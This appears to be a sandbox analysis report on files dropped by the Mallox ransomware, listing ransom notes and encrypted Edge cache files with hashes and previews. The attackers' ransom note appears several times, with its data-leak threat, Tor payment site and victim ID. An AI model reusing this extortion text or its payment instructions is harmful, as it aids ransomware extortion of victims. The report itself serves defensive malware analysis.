                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):45164
                    Entropy (8bit):7.995852196306439
                    Encrypted:true
                    SSDEEP:768:NWbkg4CIuKbsZM1h4KQMP2xVwCAol39XCIhIXaG8z9gYDbMZU4t2:sAdnP7lChlxCtaG7U4c
                    MD5:0FA5FC5ED6816AE3DB5D8ACB63167C84
                    SHA1:B7685F2702D9AAD3C1AE6F2589EE343950600E73
                    SHA-256:8B76463813820B24F01EA7F264B7C504EA2E11B3F166731A6D9271F6EEB14BBD
                    SHA-512:2E1B6F51C1FDD0D6B32B65809C4B3FF760E5E49B2B8D07274367B0ACC4E1DAEED986D08B090AE103D485E6E0DFB10E0FD4D0AEC98F9E1963113332BCC1231457
                    Malicious:false
                    Preview:.S\kW...w..}....gV..t...>~..w.$..RHZ...cg.n^......j.<....e....M.....(3r.)|V..Ff.c.!} ..z...!c...h..|..`..-YB.Nl]P..D...R...N.B..-...fDQ..IxG.......>...~}/.|k...u.S.Xe.u|.4...w....Y0.PS.].].=.{w.'...I .d.]..~;4Z....n$..l.I.r.y..'b...~.^E}.1.#c.]Bida.]y\`.!..-.....d.....y...+.(..Y.w.X.$Q,..jJ@...t.n.:n.S..o.L.J.x.y.....>Bzj{..U.3s.S.;..<...)..Q/pEI..'............4......R.....$...DD..p.O%.........'pg..,].!.dD%"(...*.d....../.l..z..Z.)}}o.X.8...<....x.Gy...r....HF.Y...J.....4s...A.,P...%..NQs....8.k)..<........@.6}|.r..h0.[Y.....XS.Isj.G...9mo[......J'._^.-..@...q..C.#..t&..>..S......qF.OU...S.mG.P....dI..Nf..9.wi.h....i3....{..A*...`.SA.I.r.?5zY.2.....]...m{.P`...4.h.2.,. g........cs|.m........{.k.@.k.....^NJ......u........f..._<....#.l..z......h.".[R..T.....@.^....q.)(t.Y'q.)P.~6]....\.*..kQe..a...{d....jI.*..DZAj......o+....e.n,.....|....Ax_........IS.5.^J.U......Q.>.d.^.e.......V....$...`..a....."=...S..+.K..5.. D9v"....>.C(n.d

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999265140444031
                    Encrypted:true
                    SSDEEP:6144:8SLdkVhOlYFtj/M3LL/z7EGTLaLOB5u1fAP:tdkmAJKbzIYLaSB5cw
                    MD5:FCA5C5E23C5152600E733A05027FF4E5
                    SHA1:BA7028C7CBC38926AE13859E5BCF72F1F0DAF5CD
                    SHA-256:6F7C132AD5503D68BFB1F5DE04E62C050B9CD66C80A06072E447B63D2105F99E
                    SHA-512:56641058C86FEDD31D33DF6F4EBF1924E9B486456A4FB1C790EE0CB7C177D998519A1D0854A0AE951C24810AACE089ACA0D8FF80DB7714E491194996EFD3FF4C
                    Malicious:false
                    Preview:%.mKI...l.......D|`........5..E.Q..|......+}..ru.xE.F:A^...70..........c.4Z...!/.V&(>.a.TO*3M..A#.T.C....I......n.].............\.&.Zh9&..I.zM.a.<As.c.o.\...B.....}a.y\..c)D.9{]Y....h` ...1C....fOa.n..].UCs.).}-.z.!..]7(..%*D........s.(*.oUu..Hcv..%j.p.YX....~..a..^.7....H...y..QR...0!S..;...?.'@.^.V.m.h.......c.}.....Oq.*No.....P..dk....L.....e.X.)....5....P.....b.>N.....X$7...-T~b..D..2}......|)...V.Y..6.+...oI...g.eb.[<.1)..o.F(........E......+.M...c.v._"8.!.9=WfM..B.3../.0..Y.$............j%...Z...b......(;.}.5....Z.~..*.....F.....E...4TNr||..^J:.*KG}1........5.T.#..@6,tg.W.?|...;$....?.s......S.m...".F.....^2..7.....a.N.......Z8.@..Nu.....@p.WT96p......<m.I....;,t.......U......w...._......\......C.5+.6...\w..."{...i.h..lS,k.B..Eu... H..3+....r.o.E.y..._.B....7.{.[..i..$o.La8...1.O.....4.(g.c.j.....o.{.t_..(.Ix...Z~.....CNi...C.V..$V..[...;.$o.sBm.g#.m..........|.-....'..!/.). .,..T........|.2....)Sw\A=...[.i;.$).?....{..R.......NM

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4202604
                    Entropy (8bit):7.999956747879277
                    Encrypted:true
                    SSDEEP:98304:ewFmd3rFWwrg8ZbpM/5nPRGjZtdYYknlBn22rdTkYgh3:jERpWwrgMpsoAnlB22zc3
                    MD5:C677107685B1E90CBB8997622440AB3B
                    SHA1:DD55AF1BF377663B1B9391FB36C1D1009C959343
                    SHA-256:74BC0B66E734D40024E8CB1B86FDB22A2AFFD196A03403E599548AF344B1BFAE
                    SHA-512:4C4072ADA742BBCBD426B543B9EB8D15001C3A851BD528C4A3E99107D73D8B667CCCDB16ECE45CAFD85786DB3E791DEB69C9B7AC176C711331AEA2194134A069
                    Malicious:false
                    Preview:cV.!..k...:.v....O...2v.|.0O..7h.?M......b..-..*......<...4.0.7l...,x.w.!tR.=R..D.Iz.......k...:.;7.c...o....(s....$T.......p.W.r.^GF...oS..8Frs.zg...3...VSh.i.@.......f......EBd.&.@Yt....+...Q+....O.m.....Zi..L..2y...L@"o][.hqYO..*ju.x.... w.<w....?*f}....(m.......hr.W,j.....6.,..k..u~.p.R....w;;.uD.:..S.[.R....f.&.....$.......V..$...:+y..W"..E...Qy..p .x.x.DN.v...sR..}i....1G.{b.`....s......-...B.....t.3V{..y...2...IIS.....\....a.2.....-.<Y"....U5...f.q.........d.9s......./....0..a.o.Ss^.nJ.......1...M=dT.m.G...+..7.......6....^;.0..\......o^.......bI.cu.9......Q2.......=r.'/....N...]z..J....tpOfa.@....L?*[.o.{..0.B^.3.j.&.~...EX...I&[.l..:..n.......WM..Hr.....>...;jA4EI.B.H..).c..<.H:.W...U....f.h.+.h...!.M`..<...l..$...<].2..h..........4.j5.j.P.e3..........Dr..4........-.p..N.G.Y.0Z.N.....5-.....5..l.........r-.+.......P..eI...+.....?7pbZ.@_.u[...n..5.j..D.n-.A.7?;.R.....P...lV9)....(..0.....1.H..lK>..W.^.=.'.Z...c..Qp....XAl..KP

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000001

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):157554
                    Entropy (8bit):7.998822616958935
                    Encrypted:true
                    SSDEEP:3072:As8xEOMplt7flTcnEEwZ+rvlwlnl8gUnIMIn8JFA2Z2BHtq8B:gqOMpnlTcEE3vklPUIME8k2ZOU8B
                    MD5:3E036E612E5BF10410991BE1E39796CC
                    SHA1:56E1C8839C3FEBC2048A41BE692E085B597DBA89
                    SHA-256:559145911BE3620677D5B23332B5FFD5A9762FAC9F8F49B92160BEB43F714E88
                    SHA-512:68982F31A66E87D0A9E1DFAB92197ACE539C89ABAC76F22F7EA959DECD4D02780CAB29E5CB88CCEC590265DD4CC8C861B8DE5C8645AB3AD2CC52AE77E95A9CA7
                    Malicious:false
                    Preview:{.ADE.9...HW...a.#PY6?i..i..C.F.,k...`g.K.0wYw...f.#.<b.....B7qj..T.E.c....94..%.:.&..5..:{*m.<.<).X.>8(..W....c...2.9`......0&../....D.....}...A.h../..;.y...n..T$Gp....y.....&rQ(.U......qI...w.]:*.$f..i.....E.qF.wd>]....m^..S>.qS.!..3.....1}....E..1c...b.d.8.....E.<d2......8.XA[....f.,......&.|<G..t.Zt.Y.e?|r.-L.p..Z.{8.i~La.L.......z..C...u..K..5....lSgG.a`.&.....2.P.!.../....3h..v....O^...#.,.\...E].oU....x~..!.x.... .l..K.....k..?u.......}!cgj.y....../.P5|.,.D3T..EmN....,p..t~=.."..L.]....u.f.Z......V.1.4.g...(.Lv..P.....U..u....O@r.F.D.5.......#...X...8......,...&.{j.0.f.....>a0....B!-....T<x..mV...O0}.f.*..m(|.fe...F..&.o...!Zu..\..j`..>...<g...z....x.{..p...b.2xp.'.c.8f..bs...4W.?q.]......23...%.w#Pw$..5h..tt.bg.I.....v..2.+.........,-...Z..$J...0@.o.+......$.^fn.."...ci....QFd[.q1.\.2...u.m...m......7N..r{..^..=.,..;.=@..*............O0....9..!.a.B...._&t..1..W.q.u....7jo..\...S#...o.Q..$G2.m..b.4..?.C.a...u.\.|.O...".m.>u|.......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000002

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:DOS executable (COM, 0x8C-variant)
                    Category:dropped
                    Size (bytes):68041
                    Entropy (8bit):7.997110893791567
                    Encrypted:true
                    SSDEEP:1536:PWP8jMdrucGYAbUXIIXvK6mTCWudg+kGAxgB5DoxJ0kJO:uaWrucG7cTvmMdVAyVoxNo
                    MD5:3C8518054EED8E02EADADC932268DB37
                    SHA1:7A5443DECD544E9B6271A46DCC88B5BA394C5879
                    SHA-256:FAD94BFCAB4A45AD756B2C3A0B7414F5CACCAC91C5B96A33F1DB5E43E4789079
                    SHA-512:0D281C3F637BF800389194E5B4BAABB6C961294A13E466DFB8CFFEE1368D290295C9CD25D3289D326CE572BC68B30A89DF32852A2FCF8749F87BB46260283E53
                    Malicious:false
                    Preview:.n.IxJ.f....4\b.%.......Y'..-......l...vad^.*.....?...~.)..%.?.Y.<c.J..a..4...l....]..P....YJ..(/.!.b.6J.G.Tlb_..7..Y._g...?%..-.....?...9::........XF.:J,..U....}.J...H...d~...j...+..N..F....+".7..?w[.........h.%.9P.>.8K.w{I.+...qOkj..1...n;.]...K."....[....'.:.8D~...[m...QyW!..+~..5t...,<...,..T\@.t.B..O.N9w...zJ0.u.....1t....s...3"..[.`?h9.1.`S&..qB..:F[?bM...2..6...O?.nc.........>6,B:....u.. ....*.H~...6... .=0J.t..[S..*..?..it......j..\E...&...Yfym..#..P.+L.J..9.v.,w......~...s..Z..Z....I...#.*.m..K.... ........5...O.}...qp.m...||D .X8.HX...4...^..,...0..[.s.........y......Z...mv.,...Wb\.I7...x....._...9..C8..D..S..:).F..ho.Y.9jFX..c"...:...s..aB3C.0.>..cSkP&%..>..,\O..j..o,....X).UB.M.B...ae.P~...........0.O...~*...)8..hJ..../.Y...a.U`..;#W....b......S8P..Z..`.....(T. (.:]%G/...7".U1.q>PW.../...1...U..v......L..m.M.....^....4.@[m....l9x...........+....zG......6/.d...1..47...wj:....}.X..?...../0.P....!D../`....k..9.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000003

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):398421
                    Entropy (8bit):7.999578906885673
                    Encrypted:true
                    SSDEEP:12288:JSAmuZKZcdb0JdGNO+1+jeL7mAfjoPO75:JSKb0dOxxmAfsk5
                    MD5:FDCDF24C05B84FFFC5C00D810DCE0157
                    SHA1:13274C75D71962367DA1E7ECE8E2291DB0528DFF
                    SHA-256:9A0FFE7758C2FCC575D68FCAAA4A56E91B4A751DD919761AC37E5A03F5840BF4
                    SHA-512:7CE6BD599EFE63F8173C8264D2ABBFDE14F966632DE5CA5A8BFFBC81668B5EB5D9E2E8D44984BAFF0384C6F1D3CFE6DADA0CACD917E5803CD1CE90F455580780
                    Malicious:false
                    Preview:3..=N.....*.$.)..~/|>.R.O....%....#jOR.....M.!......y.z*...R..y.O.&......H.=....8.C......&.4._...G..E4,3..s..rJ.R.....l...Q...h.p.`.|.Id...o.K2.3.n.....]T.....zx...j.0..........Nb..........`.....W..~..7....L.ev.c7<...../KXo.(,.;V..!.0g...@.Gg..:M./.]...l..yMGnFJ......+....r... ..M .*~E"8.t...V.,..V.I5.*.?..9..gZ....,_~.0{....S..F..C!].`.....|j....o..zE.'..T.$M..cF..{._X....\.Y2.}..8A....~*..!l4.6u.:._Y.T....3.7n%9......`UH/;...+D..R.....$..4..p4.........e....=..L...XK.Qb..sKg8....wx\...Y...x.O.w.U&$mz?K?...c..eHr.....r...+.7R?y}M2.M...!....7s.9.5.....k.TH!....+IX.`..zj. ...|..V..M.....].J><..r$t....&._.RR#...W%..:..z./).&@..Q.~@%....G]..<...B.l.xU.n..M:...Lh8{....x.....1.....j..N..=....B...L?hN.B.r|x...<.r8v.=.|..Q.....3..^=.+.....{q..[.i..N...R.2dQ^D..E>b5..s[9... ...0.[....W.d...!.p..&.n.]>.-.1..C.D.&%tu...1L=u5.x\...[..g.f_..;.t3V...+...=..]......B..q......E.J^9...n.......PSm:.N.(7..<.AE.....j.(v*.`...wxf...:Y.)..%......'...cOh..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):524764
                    Entropy (8bit):7.99960587118728
                    Encrypted:true
                    SSDEEP:12288:2PZ1l/4QdKLxdZSGtNBTnK2aqID7kwDhG3CM1pQv/YTu:2PPRZdKLzZ5R71aT7/DhG3CMsv/7
                    MD5:6C6BC0EB3BD6C22C48C51C9D447FD923
                    SHA1:D7623B0C60A3961AF7C7A07E4E9477678357F4C2
                    SHA-256:F3EB69E781C099D744DAFA3B6B5DBE1D40BC30C119B7F04442AA12A88A129D25
                    SHA-512:B561944A70CF97E8A6BFD60776162C03FA2B69D1E3FA25140A12AA7E812E84B317ABA8E0BC4C7FD108A016721AC01C27C18CFA4C759210DF4ADA3903DE5986C6
                    Malicious:false
                    Preview:q.....$y>\.9.#KcF.v)..Y..L1.s........Q`r.SAk.u.......-=.a`.5..z.%fIC....e..>m.F.....!@q8.ZJ~...E......:....i..DD.kH....bF1..>....p$..K..;.PTy(.....8.Y..@..;B...^.......B.Vs.....{.7....&1.....gH.L...O.W.Mm..r....q3t.:C.N..P?..=..Z[+v.cj6.]!.~..8So.nFf.....G.K....^.O..2...*. ......w..j..\:....S....-T....r.C..YvX.s.h].^.t`.iG^P.0..L..i.{.,.j^.,.Z.:.ev..z...$p...U...7X.....?.${...vB..^.M]..}\....)..=.Z.>.\..<.t....d.nN.V..T.R.O... E..s....NX....W.Q..u^...u......|.t..pS.....n."d.&9....X...'....Lapcr..*c.f..w....:....-I.L.?M4..G.rSp...Wa..._.v.m..K.;k.x.[V.x..&...9..Z..a.M._......Jl.t.\4..$....y p.........N1...{J...7..a....D....?.BR..%<50..*..:.@..deki4_..=..C..'%.d.t+U5....5...=....GC.>..|..B....._Hq[...&..........B..~..Ym..s....N..........c./.J.5..OE..[.z..y..d.....N..........5..yh..`..A....D...S.D.......L"0HK..tm.q..3..L.....j!..:. ..u..u..g6.~...}...D....&z[........)S..v..Y..a...\..^?!..W...(HsP1[..Rz.S..&.....D..F?..<.M.5..p.n...S?p

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999325308028859
                    Encrypted:true
                    SSDEEP:6144:vt9zDOis2JqztkYpM61eH7EWeu9vk2j9/41RHN6jPw:vt9zDaAZ/Dp4fwjPw
                    MD5:A892C72EF1C8DA02652D67E652F0D0B2
                    SHA1:9922E1EAE1BBECC51BC206F4B4C4169359037F39
                    SHA-256:84EFB5A65D468CF24E1784E0311F3F82BF087F8B0186F6F7FD2A324CAAEA8070
                    SHA-512:D501FD49B4F6497B7A9A1793DB372F245B9DBB2F9B728FFCF9DED1EEAA6B383DD86C321F1A62466F2858BD27B076B449319C4EEF9A714EFD2A1B60FF6C2E5B0E
                    Malicious:true
                    Preview:{"...e..4..vc@...*.$.z1b.H...L..........\ ...I+y.C.V/.,'h:...-..4.jX.........._.......gp&[..3yn..dPf..:..w....x..\.e.p....n$.D.....2....".r....T..A....4+..nt.i..R.r`...]8.. u...b..5....... .YI..k>.....F..5.^y`@..;XDSe.J....5.~#....R.ji......l.O......^v.$[..^..4u.VE....r<.Tx.............7......K.zi...~..t....i....u...3..x[.B.{ ../.O..........|.]X.).....K...fB.H.o..."Z.R1....,./g~..n.D.,...}.).MEp./...u+........m...Q...yv...>...p.d..Z.....'......w..h)B...pTH.p.W...@H..P.+/...=v.vO(:aG.c. ...."...>.Nd.\...b..(.%.....!.C....t....{.mJ.Z=......^Ywn...Rk8.a?..B........g4.|ba...a.~...S.>\!..~.....M.#..Kc6........9...`.....&.G.L...?.+..y_.#.X....V.....i...Y.9&....\.+!.;...=7.eE..*..q^..W.(....IMJ....u-e/.E.o..z....f.....s..Z.N..2.....D3...#tQ-.Y:.)...K.>_(......6......6g_@.s........p.. @c..C....`...Yy...y...<>......./`........S..|~..d...\.<<$..LIM..`...=y......s..g....A;.!.S.a430.7.-..#...h`.*..l.=*....|.u..e.R..s.$.u..)...'.'.V...,

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.99939419669962
                    Encrypted:true
                    SSDEEP:6144:dab7CE4d6xgIqAMeI4whshhBW0hFgDYAQXG5mnhsPGAee:dKJ4IgIqhpshi0FgsAQXG5s/W
                    MD5:5932CC9100AEBAED557B556B61A32F01
                    SHA1:DCB7370945D0EB5016607B0944A6B083DAD09E97
                    SHA-256:48E271D12DC5E0D9001CC58728942FD3F238E091C82511FF3F370045850AE975
                    SHA-512:ACB31F25214C74A443E9C2BD5738056479F0FA96929E9D136D2F70FAFD827CA4020B35C06B6F0AD3D5A51567DA3AA22AE4DCE0F9893CF5A973DE9836D9DF2B62
                    Malicious:true
                    Preview:...9.I.,.F...B..3.........'hV..Zog8...+$.3.L.....V.=..\.B. ...\....,.2'n!./..I.J.'{.e.5...}..".."l1_..M.C........).....$.@`....+....T^&+J.q.V....{..+.]..",.....*5y.a..no....`....R....h..Y......8k.\VrZ,?m............ .Wq...~M/{|K.[.5X..+..j......e.X....a.......Q.X.....PK.8`..9...u...d..4fL...E/..xM.k...~"..&DLM.a...I.x....v..m...,q^....t3.c.H.&^.H....!...|Ow.....3.=J@`.7?.._r.......VV.e..E."W?...6H..*2x.;d.....V.=..9v.....5.H8.{....7\.r......7.r..C.~t..4..1-..\.+.P.R....&..-.].U.nz[....28wx".....S..5.X_...V..ci.Ir...=.U3P....(.^.....L.!./.k....(...YO..6!..B....z............"=...G.[..uv.....w...]../f>..".|.ZN`...k....t.#e.i..w......0.u!..U`k*|T.........\)..K.G.6...-pD..p..f.,.2..Ct...r..h......dp..c..s..rsUIA....}.Y..,.0.f..;8..A....` bTH. 5/.ux2.......&..y..` ...*}..bw%1.........>....gfp......X.&.3M.$...|...y...C+....-')M.S.....j?.0Dxs..7g.n.Pbp...k?..n2\a....e.z....l.hb....."....#P..F..V.y...9;.Gq.P..x.&N...}.=N9.K...,\....P.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.99442506545139
                    Encrypted:true
                    SSDEEP:768:xeZMSI6s98uN3YeE7h9xkTrE1H+Z7/Hn/qMaY77ArdwhwBv4oun:xeZTA8777aI1eV1aYRhwBv4rn
                    MD5:DCB66E4DB925300F948879E8A9B70648
                    SHA1:ED82AA6A06E7735E360B0A7BB94C410EE0862077
                    SHA-256:E99233EB8A688B071B744EA67C312BB01E303FAA227C519B4EBE3DC00711033A
                    SHA-512:7E69919FA2AAB44909879E202784E148C6F895DCC918C2EB709724F1972820BAA69E8E24BA1D5BDF53E976DF3C39E1EA2E01A3F1D200E6729D981C18B35DA11E
                    Malicious:true
